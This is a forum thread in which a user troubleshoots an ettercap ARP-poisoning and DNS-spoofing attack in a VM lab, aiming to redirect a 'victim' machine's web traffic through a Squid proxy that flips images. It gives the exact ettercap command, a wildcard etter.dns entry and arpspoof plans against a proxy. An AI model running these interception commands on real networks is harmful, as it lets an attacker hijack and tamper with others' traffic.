Ettercap: Slow Ping On "victim"

[Blue Dragon]

Hi,

I've been playing around with ettercap in a VM a little bit. I used

sudo ettercap -T -q -P dns_spoof -i eth0 -M ARP /192.168.0.134/ //

with 192.168.0.134 being a second VM ("victim"). The etter.dns has nothing but

* A 192.168.0.150

in it with 192.168.0.150 being my first VM ("attacker") that is running ettercap.

Basically I wanted to test the "upside-down-ternet"-prank on my test network. It worked quite well and actually turned the images around like it should do.

However, I've noticed one problem: When you go to a new site on the "victim", this site takes very long to load. Is sometimes takes up to a minute for the site to respond, but sure enough, in the end it loads and the images are upside down!

The strange this is, that once flickr.com for example is loaded, browsing the site is very snappy and all the images load as fast as always and they're all upside down!

So it seems that the initial dns-lookup/ping takes very long, but once a connection is made, everything is as fast as it should be.

I also tried speedtest.net which gave me 27Mbit Downspeed (normally I only get about 6Mbit so I guess it messured the LAN speed) and 0.5 up (normal). Then I tried pingtest.net and it gave me an error saying that it couldn't connect to the server because it timed out.

Then I tried pinning google from the "victim" while ettercap was running the dns-spoof:

vadmin@vadmin ~ $ ping google.de

PING google.de (192.168.0.150) 56(84) bytes of data.

64 bytes from mint8-2.local (192.168.0.150): icmp_seq=1 ttl=64 time=0.159 ms

64 bytes from mint8-2.local (192.168.0.150): icmp_seq=2 ttl=64 time=0.202 ms

64 bytes from mint8-2.local (192.168.0.150): icmp_seq=3 ttl=64 time=0.188 ms

64 bytes from mint8-2.local (192.168.0.150): icmp_seq=4 ttl=64 time=0.194 ms

64 bytes from thom-mint8-2.local (192.168.0.150): icmp_seq=5 ttl=64 time=0.196 ms

^C

--- google.de ping statistics ---

5 packets transmitted, 5 received, 0% packet loss, time 80183ms

rtt min/avg/max/mdev = 0.159/0.187/0.202/0.022 ms

Notice that it took 80183ms to finish 5 packets! Without the dns-spoof, it only took 4003ms! However, each individual packet went over the wire in 0.2ms (LAN-Speed) compared to 68ms.

vadmin@vadmin ~ $ ping google.de

PING google.de (216.239.59.104) 56(84) bytes of data.

64 bytes from gv-in-f104.1e100.net (216.239.59.104): icmp_seq=1 ttl=48 time=68.5 ms

64 bytes from gv-in-f104.1e100.net (216.239.59.104): icmp_seq=2 ttl=48 time=67.3 ms

64 bytes from gv-in-f104.1e100.net (216.239.59.104): icmp_seq=3 ttl=48 time=68.3 ms

64 bytes from gv-in-f104.1e100.net (216.239.59.104): icmp_seq=4 ttl=48 time=67.8 ms

64 bytes from gv-in-f104.1e100.net (216.239.59.104): icmp_seq=5 ttl=48 time=69.0 ms

^C

--- google.de ping statistics ---

5 packets transmitted, 5 received, 0% packet loss, time 4003ms

rtt min/avg/max/mdev = 67.385/68.235/69.035/0.613 ms

One other thing: When I set up the victims Browser to use 192.168.0.150:3128 as a proxy and didn't use ettercap at all, everything works perfectly! All the images are upside-down and opening a new site is very fast. So there really seems to be something wrong with my dns-spoofing. I'm running "ettercap NG-0.7.3" on a Linux-Mint 8 VM in VMWare Player 3.0 with a bridged network card.

I have ip_forward activated on my "attacker"-box and as I said, everything works when I let the "victim" surf through 192.168.0.150:3128 as a proxy.

I would really appreciate some help! ;)

[Blue Dragon]

Anyone? As I said, it all works perfectly when the "victim" connects voluntarily to the proxy at 192.160.0.150:3128

What if the browser on the "victim" was already set up to use a proxy-server. Like in this case, 192.168.0.12:3128

How can I spoof the network so that the browser connects to 192.168.0.150 instead of 192.168.0.12 ?

I've tried arpspoof (set it up in two terminals, one for Victim-Gateway(proxy); one for Gateway(proxy)-Victim as discriped here: http://su2.info/doc/arpspoof.php), but it didn't work. The "victim" could connect to the internet and the pictures weren't upside-down!

I've also tried ettercap without the "-P dns" part as this is what seems to slow things down. Didn't work either, images all right-side-up.

Do you think that doing this all in a VM could be an issue? I have 2 VMs running on a Core i7 Win7 box, so CPU shouldn't be a problem. Maybe the network card is to slow or sth? wild guess, yeah...

[Infiltrator]

Anyone? As I said, it all works perfectly when the "victim" connects voluntarily to the proxy at 192.160.0.150:3128

What if the browser on the "victim" was already set up to use a proxy-server. Like in this case, 192.168.0.12:3128

How can I spoof the network so that the browser connects to 192.168.0.150 instead of 192.168.0.12 ?

I've tried arpspoof (set it up in two terminals, one for Victim-Gateway(proxy); one for Gateway(proxy)-Victim as discriped here: http://su2.info/doc/arpspoof.php), but it didn't work. The "victim" could connect to the internet and the pictures weren't upside-down!

I've also tried ettercap without the "-P dns" part as this is what seems to slow things down. Didn't work either, images all right-side-up.

Do you think that doing this all in a VM could be an issue? I have 2 VMs running on a Core i7 Win7 box, so CPU shouldn't be a problem. Maybe the network card is to slow or sth? wild guess, yeah...

That one might be a little bit trickier, you have to be sitting in between the client and the proxy server.

[Blue Dragon]

Thx for the answer.

That one might be a little bit trickier, you have to be sitting in between the client and the proxy server.

Well, I'm on the same network, so all I would have to do is aprspoof both the victim at 192.168.0.134 and the proxy at 192.168.0.12 into beliving I was the other one.

victim: 192.168.0.134 (set up to use proxy 192.168.0.12:3128)

proxy: 192.168.0.12

attacker: 192.168.0.150 running squid-proxy+upside-down-ternet script

As I said, when I set up victim to use 192.168.0.150:3128 as proxy, everything works.